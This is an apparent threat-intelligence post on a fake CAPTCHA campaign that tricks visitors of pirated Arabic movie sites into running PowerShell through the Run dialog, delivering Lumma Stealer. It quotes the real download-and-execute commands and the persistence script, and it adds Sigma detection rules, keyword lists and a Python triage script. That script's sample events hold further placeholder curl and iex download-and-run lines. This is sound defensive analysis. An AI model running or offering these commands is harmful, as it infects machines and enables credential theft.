Fake CAPTCHA Campaign on Arabic Pirated Movie Sites Delivers Lumma Stealer
Summary
I began investigating an incident where multiple users in various environments executed the same PowerShell command via the Run dialog. Upon further analysis, I discovered a fake CAPTCHA campaign targeting visitors of Arabic pirated movie websites, including but not limited to:
- Egybest
- Halacima
- Shahedpro
- Mycima
The threat actor appears to have purchased ads on these and other similar websites, redirecting visitors to a fake CAPTCHA page designed to start a malicious infection chain and deliver Lumma Stealer.
This post is broken down into three main sections:
- Technical Details
- Detection Opportunities
- Hunting Hypothesis
1. Technical Details
My investigation revealed that several users had visited the same fake CAPTCHA verification site after being redirected there by ads on pirated movie platforms such as Egybest, Halacima, Shahedpro, and Mycima. The page instructed them to open the Run dialog (Win+R) and paste and execute a PowerShell command.
The PowerShell command that the user was asked to paste and run was:
powershell.exe -W Hidden -command $url = 'https://filehere0987[.]b-cdn[.]net/zuni[.]txt'; $response = Invoke-WebRequest -Uri $url -UseBasicParsing; $text = $response.Content; iex $text
This command fetched zuni.txt, which contained a second PowerShell script, and handed it straight to iex. The second stage was:
$rCEZu739='https://filehere0987[.]b-cdn[.]net/zuni[.]zip';
$x4Yse4tW=$env:APPDATA+'\kN3C63SQ';
$am1jRlJf=$env:APPDATA+'\eenoiljQ.zip';
$KiquR5Lx=$x4Yse4tW+'\Setup.exe';
if (-not (TesT-patH $x4Yse4tW)) { NEW-IteM -Path $x4Yse4tW -ItemType Directory };
Start-bItSTraNSfeR -Source $rCEZu739 -Destination $am1jRlJf;
EXpaND-ArcHiVe -Path $am1jRlJf -DestinationPath $x4Yse4tW -Force;
REMOVe-ITEM $am1jRlJf; StaRT-pROceSS $KiquR5Lx;
neW-iTEmProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'U46d9WU7' -Value $KiquR5Lx -PropertyType 'String';
This script performed three main actions:
- Downloaded zuni.zip with BITS (Start-BitsTransfer) to %APPDATA%\eenoiljQ.zip, extracted it into %APPDATA%\kN3C63SQ, and deleted the archive.
- Executed the extracted Setup.exe (SHA-1 1e5e32c35af6bebeb800083f5c637cb03fac3e37), a renamed copy of the legitimate, Adobe-signed AcroBroker.exe, which is susceptible to DLL side-loading.
- Established persistence by adding a value named U46d9WU7 under HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run that points at Setup.exe, so it runs at every logon.
The archive also contained legitimate DLLs alongside a malicious sqlite.dll (Lumma Stealer, SHA-1 bfc1422d1c5351561087bd3e6d82ffbad5221dae). Setup.exe loaded it from its own directory via DLL side-loading, so the stealer ran inside a process backed by a signed Adobe binary.
2. Detection Opportunities
Explorer records every command entered in the Run dialog under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU: each entry becomes a string value named a, b, c, and so on, holding the command text with a trailing \1, and an MRUList value tracks their order. Any telemetry that captures registry value writes to this key (Sysmon Event ID 13, for example, provided the key is in scope of your configuration) therefore gives us a detection opportunity.
The rule below flags PowerShell launched from the Run dialog with suspicious arguments such as a hidden window (-W Hidden), iex, or an encoded command (-encodedCommand). Because the stored value ends in \1, match on the command with contains rather than endswith.
title: Suspicious PowerShell Commands in RunMRU key
id: a7df0e9e-91a5-459a-a003-4cde67c2ff5d
status: test
description: |
    Detects suspicious PowerShell commands in the RunMRU registry key, commonly used by threat actors who deceive users
    into pasting and executing malicious commands in the Run dialog, often disguised as CAPTCHA verification steps
references:
    - https://www.forensafe.com/blogs/runmrukey.html
    - https://medium.com/@shaherzakaria8/downloading-trojan-lumma-infostealer-through-capatcha-1f25255a0e71
author: Ahmed Farouk
date: 2024/10/21
tags:
    - attack.execution
    - attack.t1059.001
logsource:
    product: windows
    category: registry_set
detection:
    selection_key:
        TargetObject|contains: 'Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU'
    selection_pwsh:
        Details|contains: 'powershell'
    selection_sus_keywords:
        Details|contains:
            - 'http'
            - 'ftp'
            - 'Hidden'
            - 'iex'
            - ' -e '
            - ' -en '
            - ' -enc '
            - ' -enco'
            - ' -ec '
    condition: all of selection_*
falsepositives:
    - Unknown
level: high
3. Hunting Hypothesis
Similarly, we can build a broader threat hunting rule on the RunMRU key to surface any actor using the same technique, possibly with different lures, commands, or methods that the detection rule above does not cover (the detection rule keys on the literal string powershell, so a lure that pastes a cmd, mshta, or other LOLBin one-liner would slip past it). The hunting rule matches every Run-dialog entry except the MRUList bookkeeping value and ping commands, so expect a higher volume that needs analyst review.
title: Suspicious Commands in RunMRU key
id: f9d091f6-f1c7-4873-a24f-050b4a02b4dd
status: test
description: |
    Detects suspicious commands in the RunMRU registry key, commonly used by threat actors who deceive users
    into pasting and executing malicious commands in the Run dialog, often disguised as CAPTCHA verification steps
references:
    - https://www.forensafe.com/blogs/runmrukey.html
    - https://medium.com/@shaherzakaria8/downloading-trojan-lumma-infostealer-through-capatcha-1f25255a0e71
author: Ahmed Farouk
date: 2024/10/21
tags:
    - detection.threat-hunting
    - detection.emerging-threats
    - attack.execution
logsource:
    product: windows
    category: registry_set
detection:
    selection_key:
        TargetObject|contains: 'Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU'
    filter_mrulist:
        TargetObject|endswith: 'MRUList'
    filter_generic:
        Details|contains: 'ping'
    condition: all of selection_* and not 1 of filter_*
falsepositives:
    - Likely
level: low
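As an added example (not code from the original post), the following Python reimplements the matching logic of both Sigma rules above, the detection rule from section 2 and the hunting rule from section 3, and runs it over constructed Sysmon Event ID 13 (registry_set) events shaped like real RunMRU writes. The sample events are constructed, not telemetry from the incident, and the lure hosts under example.invalid are placeholders. It also demonstrates one caveat to weigh before deploying the hunting rule: Details|contains: 'ping' is a substring match, so it suppresses any command that merely contains the letters "ping" somewhere (a URL or path such as shopping.txt), not just ping.exe; the tightened variant in the code, an assumption written to correspond to Sigma's |startswith modifier, only drops commands that begin with ping. On a Windows host, dump_live_runmru() reads the current user's RunMRU with the standard-library winreg module so the same logic can triage a suspect machine.

```python
"""Triage RunMRU writes with the logic of the two Sigma rules above.
Added example, not code from the original post. Sample events are
constructed; the example.invalid hosts are placeholders."""

RUNMRU_PATH = r"Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"

# Keyword list copied from the detection rule (section 2).
SUS_KEYWORDS = ["http", "ftp", "Hidden", "iex",
                " -e ", " -en ", " -enc ", " -enco", " -ec "]


def _contains(haystack, needle):
    # Sigma string modifiers match case-insensitively by default.
    return needle.lower() in haystack.lower()


def _in_runmru(event):
    return _contains(event.get("TargetObject", ""), RUNMRU_PATH)


def detect_powershell_runmru(event):
    """Rule 1: a RunMRU write whose Details names powershell plus a keyword."""
    details = event.get("Details", "")
    return (_in_runmru(event)
            and _contains(details, "powershell")
            and any(_contains(details, kw) for kw in SUS_KEYWORDS))


def hunt_runmru(event, ping_filter="contains"):
    """Rule 2: any RunMRU write except the MRUList value and ping commands.
    ping_filter='contains' reproduces the rule as written (substring match);
    'startswith' is a tightened variant (assumption: Sigma's |startswith
    modifier) that only drops commands beginning with 'ping'."""
    target = event.get("TargetObject", "")
    details = event.get("Details", "")
    if not _in_runmru(event) or target.lower().endswith("mrulist"):
        return False
    if ping_filter == "contains":
        return not _contains(details, "ping")
    return not details.lower().startswith("ping")


def triage(events, ping_filter="contains"):
    """Return (rule1_hits, rule2_hits) as lists of the matching Details."""
    r1 = [e["Details"] for e in events if detect_powershell_runmru(e)]
    r2 = [e["Details"] for e in events if hunt_runmru(e, ping_filter)]
    return r1, r2


def dump_live_runmru():
    """On Windows, read HKCU's RunMRU into the same event shape (one dict per
    value). Returns [] on other platforms or if the key does not exist."""
    try:
        import winreg
        key = winreg.OpenKey(winreg.HKEY_CURRENT_USER, RUNMRU_PATH)
    except (ImportError, OSError):
        return []
    events = []
    with key:
        i = 0
        while True:
            try:
                name, data, _ = winreg.EnumValue(key, i)
            except OSError:  # end of the value list
                break
            events.append({"TargetObject": f"HKCU\\{RUNMRU_PATH}\\{name}",
                           "Details": str(data)})
            i += 1
    return events


def _ev(value_name, details):
    # Sysmon Event ID 13 reports the key under the user's SID hive; Explorer
    # stores each Run-dialog entry as value a, b, c, ... with a trailing '\1'.
    hive = r"HKU\S-1-5-21-1111111111-2222222222-3333333333-1001"
    return {"TargetObject": f"{hive}\\{RUNMRU_PATH}\\{value_name}",
            "Details": details}


SAMPLE_EVENTS = [  # constructed, not telemetry from the incident
    _ev("a", r"powershell.exe -W Hidden -command $url = 'https://filehere0987[.]b-cdn[.]net/zuni[.]txt'; "
             r"$response = Invoke-WebRequest -Uri $url -UseBasicParsing; $text = $response.Content; iex $text\1"),
    _ev("MRUList", "ba"),             # order bookkeeping, not a command
    _ev("b", r"ping 10.0.0.1 -t\1"),  # benign, filtered by rule 2
    _ev("c", r"notepad\1"),           # benign, but rule 2 surfaces it for review
    _ev("d", r"cmd /c curl -s https://lure.example.invalid/x.bat -o %TEMP%\x.bat && %TEMP%\x.bat\1"),
    _ev("e", r"powershell -W Hidden -c iex (iwr https://lure.example.invalid/shopping.txt).Content\1"),
]

if __name__ == "__main__":
    events = dump_live_runmru() or SAMPLE_EVENTS  # live key on Windows, else samples
    for label, hits in zip(("Rule 1 (PowerShell + keyword)", "Rule 2 (hunting)"),
                           triage(events)):
        print(label)
        for d in hits:
            print("   ", d[:90])
```

Run it as a script: on Windows it triages the live key (falling back to the samples if the key is absent), elsewhere it runs the samples. Event "e" shows the filter caveat: rule 1 catches it (powershell plus -W Hidden), but the hunting rule as written drops it because "shopping" contains "ping", while the startswith variant keeps it. Event "d" shows the reverse: a cmd/curl one-liner that rule 1 never sees but the hunting rule surfaces.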